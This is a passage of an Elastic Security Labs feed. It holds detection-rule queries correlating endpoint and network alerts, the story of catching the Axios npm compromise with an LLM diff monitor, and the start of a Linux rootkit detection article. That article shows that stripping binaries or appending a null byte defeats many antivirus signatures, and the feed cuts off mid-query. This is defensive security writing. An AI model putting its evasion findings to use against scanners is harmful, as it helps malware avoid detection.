<p><img src="https://www.elastic.co/security-labs/assets/images/higher-order-detection-rules/image7.png" alt="" /></p>
<p>The same <a href="https://github.com/elastic/detection-rules/blob/d358641c452dc0af5ab85d02f6f8948ec57c7ab9/rules/cross-platform/multiple_external_edr_alerts_by_host.toml#L16">logic</a> can be applied to an <a href="https://github.com/elastic/detection-rules/blob/main/rules/promotions/external_alerts.toml#L27">External Alert</a> from other third party EDRs:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/higher-order-detection-rules/image2.png" alt="" /></p>
<h3>Endpoint with Network Alerts Correlation</h3>
<p>A powerful detection approach is correlating endpoint alerts with network alerts. This helps answer the key question:</p>
<p><strong>Which process triggered this network alert?</strong></p>
<p>Network alerts alone often lack process context, such as which user or executable initiated the activity. By combining network alerts with endpoint telemetry (EDR data), you can enrich alerts with:</p>
<ul>
<li>Process name and hash</li>
<li>Command line and parent process</li>
<li>User and device information</li>
</ul>
<p>The following query correlates any Elastic Defend alert with suspicious events from network security devices such as Palo Alto Networks (PANW) and Fortinet FortiGate. The join key is the IP address: for network alerts, this is <code>source.ip</code>, for endpoint alerts, it is <code>host.ip</code>. The query normalizes these into a single field using <code>COALESCE</code>, enabling correlation across data sources that use different field names for the same entity. This may indicate that this host is compromised and triggering multi-datasource alerts.</p>
<pre><code>FROM logs-* metadata _id
| WHERE 
 (event.module == &quot;endpoint&quot; and event.dataset == &quot;endpoint.alerts&quot;) or
 (event.dataset == &quot;panw.panos&quot; and event.action in (&quot;virus_detected&quot;, &quot;wildfire_virus_detected&quot;, &quot;c2_communication&quot;, ...)) or
 (event.dataset == &quot;fortinet_fortigate.log&quot; and (...)) or
 (event.dataset == &quot;suricata.eve&quot; and message in (&quot;Command and Control Traffic&quot;, &quot;Potentially Bad Traffic&quot;, ...))
| eval 
      fw_alert_source_ip = CASE(event.dataset in (&quot;panw.panos&quot;, &quot;fortinet_fortigate.log&quot;), source.ip, null),
      elastic_defend_alert_host_ip = CASE(event.module == &quot;endpoint&quot; and event.dataset == &quot;endpoint.alerts&quot;, host.ip, null)
| eval Esql.source_ip = COALESCE(fw_alert_source_ip, elastic_defend_alert_host_ip)
| where Esql.source_ip is not null
| stats Esql.alerts_count = COUNT(*),
        Esql.event_module_distinct_count = COUNT_DISTINCT(event.module),
        Esql.message_values_distinct_count = COUNT_DISTINCT(message),
        ... by Esql.source_ip
| where Esql.event_module_distinct_count &gt;= 2 AND Esql.message_values_distinct_count &gt;= 2
| eval concat_module_values = MV_CONCAT(Esql.event_module_values, &quot;,&quot;)
| where concat_module_values like &quot;*endpoint*&quot;
</code></pre>
<p>Example of matches correlating Elastic Defend and Fortigate alerts where the source.ip of the FortiGate alert is equal to the host.ip of the Elastic Defend endpoint alert :</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/higher-order-detection-rules/image3.png" alt="" /></p>
<p>The following EQL query correlates Suricata alerts with Elastic Defend network events to provide context about the source process and host:</p>
<pre><code>sequence by source.port, source.ip, destination.ip with maxspan=5s
// Suricata severithy 3 corresponds to information alerts, which are excluded to reduce noise
[network where event.dataset == &quot;suricata.eve&quot; and event.kind == &quot;alert&quot; and  event.severity != 3 and source.ip != null and destination.ip != null]
[network where event.module == &quot;endpoint&quot; and event.action in  (&quot;disconnect_received&quot;, &quot;connection_attempted&quot;)]
</code></pre>
<p>Example of matches confirming the Suricata alert and linking it to the target web server process nginx from Elastic Defend events confirming the web-exploitation attempt:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/higher-order-detection-rules/image8.png" alt="" /></p>
<h3>Endpoint Security with Observability</h3>
<p>Correlating observability telemetry with security alerts is a powerful detection strategy.</p>
<p>The <a href="https://en.wikipedia.org/wiki/XZ_Utils_backdoor">XZ</a> Utils backdoor incident demonstrated that security-relevant anomalies may first surface as performance regressions rather than traditional security alerts. In that case, unusual behavior in the SSH daemon led to deeper investigation and eventual discovery of malicious code.</p>
<p>This highlights an important principle: <strong>operational anomalies can be early indicators of compromise.</strong></p>
<p>With the <a href="https://www.elastic.co/docs/reference/integrations/system#metrics-reference">Elastic Agent</a>, system metrics such as CPU and memory utilization can be collected alongside security telemetry. By correlating abnormal resource spikes with SIEM alerts either by process or by host we can increase detection confidence and surface high-risk activity earlier.</p>
<p>For example, an ES|QL correlation rule can identify a process exhibiting sustained 70% CPU utilization that is also the source of a memory signature alert for a cryptominer from Elastic Defend. Individually, each signal may be low or medium severity. Correlated together, they represent high-confidence malicious activity.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/higher-order-detection-rules/image1.png" alt="" /></p>
<p>We developed <strong>over 30 Higher-Order detections</strong> covering various types of relationships. While we can’t cover all of them here, the links below provide <strong>enough context to adapt these rules to your environment</strong>:</p>
<p>Endpoint Alerts:<br />
<a href="https://github.com/elastic/detection-rules/blob/ae88c095e95d78aae3766875de2ce8d6d34c40c4/rules/cross-platform/multiple_alerts_edr_elastic_defend_by_host.toml#L16">Multiple Elastic Defend Alerts by Agent</a><br />
<a href="https://github.com/elastic/detection-rules/blob/ae88c095e95d78aae3766875de2ce8d6d34c40c4/rules/cross-platform/multiple_alerts_edr_elastic_same_process_tree.toml#L16">Multiple Elastic Defend Alerts from a Single Process Tree</a><br />
<a href="https://github.com/elastic/detection-rules/blob/6a7c1e96749fd5c2fc8801da747f4e29d18150a1/rules/cross-platform/multiple_elastic_defend_behavior_rules_same_host_prevalence.toml#L19">Multiple Rare Elastic Defend Behavior Rules by Host</a><br />
<a href="https://github.com/elastic/detection-rules/blob/ae88c095e95d78aae3766875de2ce8d6d34c40c4/rules/cross-platform/newly_observed_elastic_defend_alert.toml#L17">Newly Observed Elastic Defend Behavior Alert</a><br />
<a href="https://github.com/elastic/detection-rules/blob/ae88c095e95d78aae3766875de2ce8d6d34c40c4/rules/cross-platform/multiple_external_edr_alerts_by_host.toml#L16">Multiple External EDR Alerts by Host</a></p>
<p>Endpoint and Network:<br />
<a href="https://github.com/elastic/detection-rules/blob/ae88c095e95d78aae3766875de2ce8d6d34c40c4/rules/cross-platform/newly_observed_panos_alert.toml#L17">Newly Observed Palo Alto Network Alert</a><br />
<a href="https://github.com/elastic/detection-rules/blob/ae88c095e95d78aae3766875de2ce8d6d34c40c4/rules/cross-platform/newly_observed_suricata_alert.toml#L17">Newly Observed High Severity Suricata Alert</a><br />
<a href="https://github.com/elastic/detection-rules/blob/ae88c095e95d78aae3766875de2ce8d6d34c40c4/rules/cross-platform/command_and_control_socks_fortigate_endpoint.toml#L19">FortiGate SOCKS Traffic from an Unusual Process</a><br />
<a href="https://github.com/elastic/detection-rules/blob/ae88c095e95d78aae3766875de2ce8d6d34c40c4/rules/cross-platform/command_and_control_pan_elastic_defend_c2.toml#L17">PANW and Elastic Defend - Command and Control Correlation</a><br />
<a href="https://github.com/elastic/detection-rules/blob/ae88c095e95d78aae3766875de2ce8d6d34c40c4/rules/cross-platform/multiple_alerts_elastic_defend_netsecurity_by_host.toml#L18">Elastic Defend and Network Security Alerts Correlation</a><br />
<a href="https://github.com/elastic/detection-rules/blob/ae88c095e95d78aae3766875de2ce8d6d34c40c4/rules/cross-platform/command_and_control_suricata_elastic_defend_c2.toml#L17">Suricata and Elastic Defend Network Correlation</a></p>
<p>Generic by MITRE ATT&amp;CK:<br />
<a href="https://github.com/elastic/detection-rules/blob/ae88c095e95d78aae3766875de2ce8d6d34c40c4/rules/cross-platform/multiple_alerts_risky_host_esql.toml#L17">Alerts in Different ATT&amp;CK Tactics by Host</a><br />
<a href="https://github.com/elastic/detection-rules/blob/ae88c095e95d78aae3766875de2ce8d6d34c40c4/rules/cross-platform/multiple_alerts_same_tactic_by_host.toml#L18">Multiple Alerts in Same ATT&amp;CK Tactic by Host</a></p>
<p>Generic multi-integrations correlation:<br />
<a href="https://github.com/elastic/detection-rules/blob/ae88c095e95d78aae3766875de2ce8d6d34c40c4/rules/cross-platform/multiple_alerts_from_different_modules_by_srcip.toml#L17">Alerts From Multiple Integrations by Source Address</a><br />
<a href="https://github.com/elastic/detection-rules/blob/ae88c095e95d78aae3766875de2ce8d6d34c40c4/rules/cross-platform/multiple_alerts_from_different_modules_by_dstip.toml#L17">Alerts From Multiple Integrations by Destination Address</a><br />
<a href="https://github.com/elastic/detection-rules/blob/ae88c095e95d78aae3766875de2ce8d6d34c40c4/rules/cross-platform/multiple_alerts_from_different_modules_by_user.toml#L17">Alerts From Multiple Integrations by User Name</a><br />
<a href="https://github.com/elastic/detection-rules/blob/ae88c095e95d78aae3766875de2ce8d6d34c40c4/rules/cross-platform/newly_observed_elastic_detection_rule.toml#L17">Newly Observed High Severity Detection Alert</a></p>
<p>Lateral movement correlation:<br />
<a href="https://github.com/elastic/detection-rules/blob/main/rules/cross-platform/multiple_alerts_by_host_ip_and_source_ip.toml">Suspected Lateral Movement from Compromised Host</a><br />
<a href="https://github.com/elastic/detection-rules/blob/ae88c095e95d78aae3766875de2ce8d6d34c40c4/rules/cross-platform/lateral_movement_multi_alerts_new_srcip.toml#L15">Lateral Movement Alerts from a Newly Observed Source Address</a><br />
<a href="https://github.com/elastic/detection-rules/blob/ae88c095e95d78aae3766875de2ce8d6d34c40c4/rules/cross-platform/lateral_movement_multi_alerts_new_userid.toml#L16">Lateral Movement Alerts from a Newly Observed User</a></p>
<p>Observability and security correlation:<br />
<a href="https://github.com/elastic/detection-rules/blob/ae88c095e95d78aae3766875de2ce8d6d34c40c4/rules/cross-platform/impact_alert_from_a_process_with_cpu_spike.toml#L17">Detection Alert on a Process Exhibiting CPU Spike</a><br />
<a href="https://github.com/elastic/detection-rules/blob/ae88c095e95d78aae3766875de2ce8d6d34c40c4/rules/cross-platform/impact_alerts_on_host_with_cpu_spike.toml#L17">Multiple Alerts on a Host Exhibiting CPU Spike</a><br />
<a href="https://github.com/elastic/detection-rules/blob/ae88c095e95d78aae3766875de2ce8d6d34c40c4/rules/cross-platform/impact_newly_observed_process_with_high_cpu.toml#L18">Newly Observed Process Exhibiting High CPU Usage</a></p>
<p>Machine Learning correlation:<br />
<a href="https://github.com/elastic/detection-rules/blob/d358641c452dc0af5ab85d02f6f8948ec57c7ab9/rules/cross-platform/multiple_machine_learning_jobs_by_entity.toml#L16">Multiple Machine Learning Alerts by Influencer Field</a></p>
<p>Other correlation ideas:<br />
<a href="https://github.com/elastic/detection-rules/blob/ae88c095e95d78aae3766875de2ce8d6d34c40c4/rules/cross-platform/multiple_vulnerabilities_wiz_by_container.toml#L18">Multiple Vulnerabilities by Asset via Wiz</a><br />
<a href="https://github.com/elastic/detection-rules/blob/ae88c095e95d78aae3766875de2ce8d6d34c40c4/rules/cross-platform/multiple_alerts_email_elastic_defend_correlation.toml#L17">Elastic Defend and Email Alerts Correlation</a><br />
<a href="https://github.com/elastic/detection-rules/blob/ae88c095e95d78aae3766875de2ce8d6d34c40c4/rules/windows/lateral_movement_credential_access_kerberos_correlation.toml#L23">Suspicious Kerberos Authentication Ticket Request</a><br />
<a href="https://github.com/elastic/detection-rules/blob/ae88c095e95d78aae3766875de2ce8d6d34c40c4/rules/cross-platform/credential_access_multi_could_secrets_via_api.toml#L19">Multiple Cloud Secrets Accessed by Source Address</a></p>
<p>These examples illustrate how correlating alerts across endpoints, network, and observability can <strong>enrich context, accelerate investigations, and improve detection confidence</strong>.  We are actively expanding coverage in this area to support additional correlation scenarios.</p>
<p>You can enable them by filtering for the tag value Rule Type: Higher-Order Rule in the rules management page:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/higher-order-detection-rules/image4.png" alt="" /></p>
<p>Over a 15-day period, alert counts remained within acceptable volume (~30 alerts/day). Targeted tuning of initial outliers is expected to reduce them to ~20 alerts/day and materially improve overall signal quality.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/higher-order-detection-rules/image5.png" alt="" /></p>
<h3>Considerations and Trade-offs</h3>
<p>Higher-Order Rules introduce potential scheduling latency. Since they query alert indices, there is an inherent delay between when base alerts fire and when correlations surface. Rule scheduling intervals and loopback windows should be tuned to balance timeliness against performance cost. Additionally, HOR quality depends directly on the quality of the base detections. A noisy atomic rule will cascade false positives into every correlation that references it. We recommend tuning base rules aggressively before enabling dependent Higher-Order Rules. Finally, ESQL queries over broad index patterns (e.g. logs-*) can be expensive at scale. In high-volume environments, scoping index patterns to specific datasets or using dataviews can significantly reduce query cost.</p>
<h2>Conclusion</h2>
<p>High-Order rules are essential for prioritizing alert triage and managing alert volumes for automation and AI-driven analysis**.** When combined with <a href="https://www.elastic.co/docs/solutions/security/advanced-entity-analytics/entity-risk-scoring">Entity Risk Scoring</a>, Higher-Order Rules can feed directly into host and user risk profiles, creating a quantitative prioritization layer that further reduces manual triage burden. In our production tests, the majority of these detections produced a medium to low alert volume, making them practical for real-world use. While a small number of noisy rules or false positives may initially surface, excluding these at the atomic rule level quickly leaves a robust set of high-value correlations.</p>
<p>To maximize their effectiveness, two operational practices are critical. First, ensure that input alerts use severity levels that accurately reflect both noise and real-world impact, cleaning and normalizing severity is foundational to meaningful correlation. Second, start small and expand deliberately: avoid trying to correlate every possible alert signal. Exclude inherently noisy tactics (such as discovery), deprioritize low-severity signals, and deprecate rules that disproportionately influence correlation outcomes.</p>
<p>Applied correctly, High-Order rules streamline investigations, improve detection accuracy, and significantly increase the efficiency and trustworthiness of modern security operations.</p>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/security-labs/assets/images/higher-order-detection-rules/higher-order-detection-rules.webp" length="0" type="image/webp"/>
        </item>
        <item>
            <title><![CDATA[How we caught the Axios supply chain attack]]></title>
            <link>https://www.elastic.co/security-labs/how-we-caught-the-axios-supply-chain-attack</link>
            <guid>how-we-caught-the-axios-supply-chain-attack</guid>
            <pubDate>Thu, 02 Apr 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Joe Desimone shares the story of how he caught the Axios supply chain attack with a proof of concept tool built in an afternoon.]]></description>
            <content:encoded><![CDATA[<h2>Preamble</h2>
<p>Last Monday night I was working late and a Slack alert came in from a monitoring tool I had built three days earlier. Axios compromised; one of the most popular npm packages in the world.</p>
<p>My heart started racing, I knew every second mattered to respond and limit the damage. But honestly it was so crazy that I thought it must be a false positive. I checked and rechecked everything a few times even though it seemed very obviously malicious.</p>
<p>It wasn't a false positive. It was one of the largest supply chain compromises ever on npm, with presumed attribution to DPRK state actors. We caught it with a proof of concept I hacked together on a Friday afternoon, running on my laptop, powered by AI reading diffs.</p>
<p>I want to share the whole story. How we got here, what I built, and why I think sharing it openly makes everyone a little safer.</p>
<h2>I've been worried about supply chain for a while</h2>
<p>Some recent supply chain incidents have genuinely had me up at night. Supply chain compromise is a hard problem. At Elastic we have so many developers, and our security customers are trusting us to protect them. It has been clear that the status quo is broken, and we need some new technology or procedures to help. I had some ideas around a more trusted, AI-vetted ecosystem, building on app control principles while limiting cost and friction.</p>
<p>But the <a href="https://www.theregister.com/2026/03/30/telnyx_pypi_supply_chain_attack_litellm/">Trivy compromise</a> was really where I took notice. On March 19th, a group called TeamPCP compromised the <a href="https://github.com/aquasecurity/trivy-action">aquasecurity/trivy-action</a> GitHub Action (the one for the popular Trivy security scanner, yes, a security tool). They injected a credential stealer that harvested secrets from CI/CD pipelines. A massive amount of credentials were stolen.</p>
<p>That cascaded fast. On March 24th, <a href="https://docs.litellm.ai/blog/security-update-march-2026">LiteLLM got hit</a>. TeamPCP had stolen LiteLLM's PyPI publishing credentials through the poisoned Trivy pipeline, and used them to push malicious versions that were aggressive credential stealers. SSH keys, cloud creds, API keys, wallet data, everything.</p>
<p>LiteLLM is a package I had used myself. So you could say at that point I was fully &quot;up at night.&quot;</p>
<p>I knew that with all the credentials leaked from the Trivy breach, there was definitely going to be more. We needed to do something to stay ahead of it. Both for our customers and to protect Elastic.</p>
<h2>Friday, after the red-eye</h2>
<p>I had just flown back from <a href="https://www.rsaconference.com/">RSAC 2026</a> in San Francisco. Red-eye flight Thursday night. If you've done a red-eye after four days of conference, you know the state I was in. However, I was excited as ever for a new project, so I sat down and hammered out v0.0.1.</p>
<p>The idea: monitor changes as they get pushed to package repos. Run a diff to see what changed. Use AI/LLM to determine if the changes are malicious. That's basically it.</p>
<p>The pipeline looks like:</p>
<ol>
<li>Poll PyPI's changelog API and npm's CouchDB <code>_changes</code> feed for new releases</li>
<li>Filter against a watchlist of the top 15,000 packages by download count</li>
<li>Download the old and new versions directly from the registry (no pip install, no npm install, no code execution)</li>
<li>Diff them into a markdown report</li>
<li>Send the diff to an LLM: &quot;is this malicious?&quot;</li>
<li>If yes, alert to Slack</li>
</ol>
<p>I wanted to focus mainly on top packages since that's most likely where attackers would go anyway, and it would be much less costly in terms of tokens and compute. It was completely manageable to run on my laptop.</p>
<h2>Why Cursor</h2>
<p>There are a lot of agent harnesses out there. I've written my own for projects like AI malware reverse engineering. But I was very short on time, so I chose to harness up <a href="https://cursor.com/docs/cli/overview">Cursor</a> since it's one of my main dev tools. The Agent CLI lets you invoke it programmatically: pass a workspace, an instruction, and a model. I run it in <code>ask</code> mode (read-only) so it can only read the diff, never modify anything. The whole analysis step is a single subprocess call.</p>
<p>The prompt is simple. I tell it what to look for (obfuscated code, base64, exec/eval, unexpected network calls, steganography, persistence mechanisms, lifecycle script abuse) and ask it to respond with <code>Verdict: malicious</code> or <code>Verdict: benign</code>. Parse the verdict, act on it.</p>
<h2>On model selection</h2>
<p>I normally use Opus 4.6 or GPT 5.4 for most things. Opus especially for cybersecurity-focused tasks. But I wanted to keep costs down for something that needs to analyze dozens of releases per hour.</p>
<p>There have been some really good blog posts from the Cursor team lately, one on <a href="https://cursor.com/blog/fast-regex-search">fast regex search for agent tools</a> and another on their <a href="https://cursor.com/blog/real-time-rl-for-composer">real-time RL approach</a> where they use actual production inference tokens as training signals and deploy improved checkpoints roughly every five hours. Genuinely impressive engineering.</p>
<p>So I wanted to give Composer 2 a shot. I used fast mode, which is truly fast. Perfect for a real-time use case. Low cost, fast, and effective (in my testing).</p>
<h2>Testing on Telnyx</h2>
<p>You have to test these things to know they'll actually work. Usually that means tweaking prompts a bunch.</p>
<p>I got lucky (or unlucky) with timing. On the same Friday I was building this, the <a href="https://telnyx.com/resources/telnyx-python-sdk-supply-chain-security-notice-march-2026">telnyx PyPI package got compromised</a> by TeamPCP. They injected 74 lines of malicious code into <code>_client.py</code>: payloads hidden inside WAV audio files (steganography), base64 obfuscation, a Windows persistence implant disguised as <code>msbuild.exe</code>, and exfiltration to a hardcoded C2.</p>
<p>I used the diff between the legitimate and malicious <code>telnyx</code> package to build out the initial prompt. The model was very good at identifying malicious changes like this. I also wanted to know immediately when a compromise was detected, so I added Slack alerting.</p>
<h2>Monday night</h2>
<p>I let it run over the weekend. It churned through releases, everything coming back benign.</p>
<p>I never got a single false positive, which is honestly strange if you've ever done detection work in cybersecurity. We're usually drowning in FPs. I intentionally instructed the LLM to only alert on &quot;high confidence&quot; supply chain compromises, as they are generally trigger-happy out of the box. Still catching the Telnyx test case, with no FPs. Could be overfitting with such a low sample size, but no time to build something more robust.</p>
<p>Then Monday night, working late, the Slack alert came in.</p>
<pre><code>🚨 Supply Chain Alert: axios 0.30.4
Verdict: MALICIOUS
npm: https://www.npmjs.com/package/axios/v/0.30.4
</code></pre>
<p>Did it really just find one of the biggest supply chain compromises in recent memory?</p>
<p>I checked the analysis. Rechecked it. Checked it again. The attackers had compromised a maintainer's npm account, changed the email to a ProtonMail account they controlled, and published two malicious versions (1.14.1 and 0.30.4). They didn't inject code directly into Axios. Instead they added a phantom dependency called <code>plain-crypto-js</code> that ran a postinstall hook deploying cross-platform malware. It was obviously malicious.</p>
<h2>The response</h2>
<p>I reached out immediately to our infosec team and research team at Elastic to get them spun up. I knew every second mattered. It turns out that when I contacted them, they had already received Elastic Defend alerts on a host that had installed the malicious package and were actively responding. But at that point nobody had realized the extent of the issue or had a root cause understanding of how the machine became infected. The monitoring tool provided that missing context.</p>
<p>I tried sending an email to <code>security@npmjs</code> and got a bounce back. Tried submitting to their security portal and got an error. I tweeted out in desperation to get a hold of a human. I also quickly opened a security issue on the axios repo itself.</p>
<p>Later, I saw a tweet from another researcher who had observed the compromise, and I realized I was handling this more as a vulnerability than a supply chain incident. With a vulnerability you coordinate quietly. With an active compromise that is installing malware on people's machines right now, going wide and open is the right call. So I immediately shared all the details I had compiled to X.</p>
<p>We even started getting alerts from our telemetry showing impacted orgs in the wild. The thing was actively running.</p>
<p>Fortunately, the Axios team jumped on it and pulled the packages pretty quickly. Also, the attacker's C2 server was getting so many requests that it was falling over. It could have been a lot worse.</p>
<p>Our team at Elastic Security Labs published full technical write-ups on the compromise. The first covers the end-to-end attack chain, the cross-platform malware, and the C2 protocol: <a href="https://www.elastic.co/security-labs/axios-one-rat-to-rule-them-all">Inside the Axios supply chain compromise - one RAT to rule them all</a>. The second covers hunting and detection rules across Linux, Windows, and macOS: <a href="https://www.elastic.co/security-labs/axios-supply-chain-compromise-detections">Elastic releases detections for the Axios supply chain compromise</a>.</p>
<h2>Where we go from here</h2>
<p>The state of things right now is not great and we need to do better as a whole software ecosystem, let alone the security industry.</p>
<p>In two weeks in March:</p>
<ul>
<li>Trivy (a security scanner) was compromised to steal CI/CD secrets</li>
<li>LiteLLM was compromised using those stolen secrets</li>
<li>Telnyx was compromised in the same campaign</li>
<li>Axios, one of the most depended-upon packages in npm, was compromised by a suspected DPRK actor</li>
<li>and more</li>
</ul>
<p>Package registries are critical infrastructure. The teams running PyPI and npm are doing great work, but the threat has moved past what current trust models can handle. We need better automated monitoring of package changes. Not just signature scanning but actually understanding what code does. LLMs are genuinely good at this, as this project shows. And we need credential rotation after breaches to happen faster. The Trivy to Litellm to Telnyx cascade happened because stolen creds weren't rotated quickly enough.</p>
<p>One practical thing you can do right now: don't pull in package updates immediately. Add a soak time. Let new versions sit for a period before your builds pick them up. We do this with our CI/CD systems at Elastic in <a href="https://www.elastic.co/blog/shai-hulud-worm-2-0-updated-response">response</a> to shai-hulud. It won't stop everything, but it gives the community time to catch compromises before they hit your CI/CD pipelines and developer machines. The good news is the many package managers have added native support for this. For example, to enforce a 7-day delay:</p>
<pre><code>npm config set min-release-age 7
pnpm config set minimum-release-age 10080
yarn config set npmMinimumReleaseAge 10080
uv --exclude-newer &quot;7 days ago&quot;
</code></pre>
<h2>We're open sourcing this</h2>
<p>We're releasing the tool: <a href="https://github.com/elastic/supply-chain-monitor"><strong>supply-chain-monitor</strong></a></p>
<p>I want to be upfront. It's a proof of concept. I built it in an afternoon on no sleep. I don't expect anyone to run it at a production level. It requires a Cursor subscription for the LLM analysis, it processes releases sequentially, and the watchlists are static.</p>
<p>But the approach works. Diffing package releases in real-time and using AI to classify the changes caught a supply chain attack on one of the most popular packages in npm.</p>
<p>I'm sharing this because it's best for the community to learn from our experiences. If someone takes this idea and builds something better, great. If a package registry team builds it into their pipeline, even better. If it means someone else has a big save next time, this was worth it.</p>
<h2>How it works (for the curious)</h2>
<p><strong>Monitoring:</strong> Two threads poll PyPI (via <code>changelog_since_serial()</code> XML-RPC) and npm (via CouchDB <code>_changes</code> feed). New releases matching the top-N watchlist get queued. State persists to <code>last_serial.yaml</code> so it picks up where it left off.</p>
<p><strong>Diffing:</strong> Old and new versions downloaded directly from registry APIs. No pip/npm install, no code execution. Archives extracted, files hashed, unified diff report generated in markdown.</p>
<p><strong>Analysis:</strong> Diff report goes to Cursor Agent CLI in read-only mode. Prompt asks it to look for supply chain indicators. Output parsed for the verdict.</p>
<p><strong>Alerting:</strong> Malicious verdict fires a Slack message with the package name, rank, registry link, and analysis summary.</p>
<h2>AI in security, beyond this project</h2>
<p>Supply chain security is a big issue, but we aren’t powerless. AI gives us new tools to defend at scale at machine speed. This project is one example of using AI to help with a security problem, but we've been doing a lot of interesting work with AI across Elastic Security more broadly. One thing I'd highlight: our team recently published a post on <a href="https://www.elastic.co/security-labs/speeding-apt-attack-discovery-confirmation-with-attack-discovery-workflows-and-agent-builder">using Attack Discovery, Workflows, and Agent Builder to automatically detect and confirm APT-level attacks</a>. This shows the power of the Elastic Platform, delivering agentic security to meaningfully improve the efficiency and efficacy of your SOC in a time when we are collectively drowning in attacks.</p>
<hr />
<p><em>The supply-chain-monitor project is available at <a href="https://github.com/elastic/supply-chain-monitor">github.com/elastic/supply-chain-monitor</a>.</em></p>
<p><em>Thanks to the Elastic Infosec team for the rapid incident response, the axios maintainers for the quick takedown, and the security community for the collective effort that limited the blast radius.</em></p>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/security-labs/assets/images/how-we-caught-the-axios-supply-chain-attack/how-we-caught-the-axios-supply-chain-attack.webp" length="0" type="image/webp"/>
        </item>
        <item>
            <title><![CDATA[Hooked on Linux: Rootkit Detection Engineering]]></title>
            <link>https://www.elastic.co/security-labs/linux-rootkits-2-caught-in-the-act</link>
            <guid>linux-rootkits-2-caught-in-the-act</guid>
            <pubDate>Thu, 02 Apr 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[In this second part of a two-part series, we explore Linux rootkit detection engineering, focusing on the limitations of static detection reliance, and the importance of rootkit behavioral detection.]]></description>
            <content:encoded><![CDATA[<h2>Introduction</h2>
<p>In <a href="https://www.elastic.co/security-labs/linux-rootkits-1-hooked-on-linux">part one</a>, we examined how Linux rootkits work: their evolution, taxonomy, and techniques for manipulating user space and kernel space. In this second part, we turn to detection engineering. We begin by showing why static detection is often unreliable against Linux rootkits, even when binaries are only trivially modified, and then move on to behavioral and runtime signals that defenders can use instead. From shared object abuse and LKM loading to eBPF, io_uring, persistence, and defense evasion, this article focuses on practical ways to detect and investigate rootkit activity in real environments.</p>
<h2>Static detection via VirusTotal</h2>
<p>Before focusing on behavioral detection techniques, it is useful to examine how well traditional static detection mechanisms identify Linux rootkits. To do so, we conducted a small experiment using VirusTotal as a proxy for traditional signature-based antivirus detection. A dataset of ten Linux rootkits was assembled from publicly available research papers and open-source repositories. Each sample was either uploaded to VirusTotal or retrieved from existing submissions.</p>
<p>For every rootkit, we recorded the number of antivirus engines that flagged the original binary. We then performed two additional tests:</p>
<ol>
<li>Stripped binaries, created using <code>strip --strip-all</code>, removing symbol tables and other non-essential metadata.</li>
<li>Trivially modified binaries, created by appending a single null byte to the original file: an intentionally unsophisticated change.</li>
</ol>
<p>The goal was not to evade detection through advanced obfuscation, but to assess how fragile static signatures are when faced with even the simplest binary modifications.</p>
<p><em>Table 1: Technical overview of the analyzed rootkit dataset</em></p>
<table>
<thead>
<tr>
<th align="left">Rootkit</th>
<th align="left">Basic detections</th>
<th align="left">Stripped</th>
<th align="left">Null byte added</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left">Azazel</td>
<td align="left">36/66</td>
<td align="left">19/66</td>
<td align="left">21/66</td>
</tr>
<tr>
<td align="left">Bedevil*</td>
<td align="left">32/66</td>
<td align="left">32/66</td>
<td align="left">21/66</td>
</tr>
<tr>
<td align="left">BrokePKG</td>
<td align="left">7/66</td>
<td align="left">3/66</td>
<td align="left">3/66</td>
</tr>
<tr>
<td align="left">Diamorphine</td>
<td align="left">33/66</td>
<td align="left">8/64</td>
<td align="left">22/66</td>
</tr>
<tr>
<td align="left">Kovid</td>
<td align="left">27/66</td>
<td align="left">1/66</td>
<td align="left">15/66</td>
</tr>
<tr>
<td align="left">Mobkit</td>
<td align="left">29/66</td>
<td align="left">6/66</td>
<td align="left">17/66</td>
</tr>
<tr>
<td align="left">Reptile</td>
<td align="left">32/66</td>
<td align="left">3/66</td>
<td align="left">20/66</td>
</tr>
<tr>
<td align="left">Snapekit</td>
<td align="left">30/66</td>
<td align="left">3/66</td>
<td align="left">19/66</td>
</tr>
<tr>
<td align="left">Symbiote</td>
<td align="left">42/66</td>
<td align="left">8/66</td>
<td align="left">22/66</td>
</tr>
<tr>
<td align="left">TripleCross</td>
<td align="left">31/66</td>
<td align="left">17/66</td>
<td align="left">19/66</td>
</tr>
</tbody>
</table>
<p><em>* Bedevil is stripped by default, and thus, the basic and stripped detections are the same</em></p>
<h3>Observations</h3>
<p>As expected, stripping binaries generally resulted in a sharp drop in detection rates. In several cases, detections fell to near-zero, suggesting that some antivirus engines rely heavily on symbol information or other easily removable metadata. Even more telling is the impact of adding a single null byte: a modification that does not alter program logic, execution flow, or behavior, yet still significantly degrades detection for many samples.</p>
<p>This highlights a fundamental weakness of static, signature-based detection. If a one-byte change can meaningfully affect detection outcomes, attackers do not need sophisticated obfuscation to evade static scanners.</p>
<h3>Obfuscation techniques in rootkits</h3>
<p>Interestingly, most of the rootkits in this dataset employ little to no advanced static obfuscation. Where obfuscation is present, it is typically limited to simple XOR encoding of strings or configuration data, or lightweight packing techniques that slightly alter the binary layout. These methods are inexpensive to implement and sufficient to defeat many static signatures.</p>
<p>The absence of more advanced obfuscation in these samples is notable. Many are open-source proof-of-concept rootkits designed to demonstrate techniques rather than to aggressively evade detection. Yet even with minimal or no obfuscation, static detection proves unreliable.</p>
<h3>Why static detection is not enough</h3>
<p>This experiment reinforces a key point: static detection alone is fundamentally insufficient for reliable rootkit detection. The fragility of static signatures (especially in the face of trivial modifications) means defenders cannot rely on file-based indicators or hash-based detection to uncover stealthy threats.</p>
<p>When binaries can be altered without affecting behavior, the only remaining consistent signal is the rootkit's behavior at runtime. For that reason, the remainder of this blog shifts its focus from static artifacts to dynamic analysis and behavioral detection, examining how rootkits interact with the operating system, manipulate execution flow, and leave observable traces during execution.</p>
<p>That is where detection engineering becomes both more challenging and far more effective.</p>
<h2>Dynamic detection engineering</h2>
<h3>Userland rootkit loading detection techniques</h3>
<p>Userland rootkits often hijack the dynamic linking process, injecting malicious shared objects into target processes without needing kernel-level access. An infection begins with the creation of a shared object file. The detection of newly created shared object files can be detected through a detection rule similar to the one displayed below:</p>
<pre><code class="language-sql">file where event.action == &quot;creation&quot; and
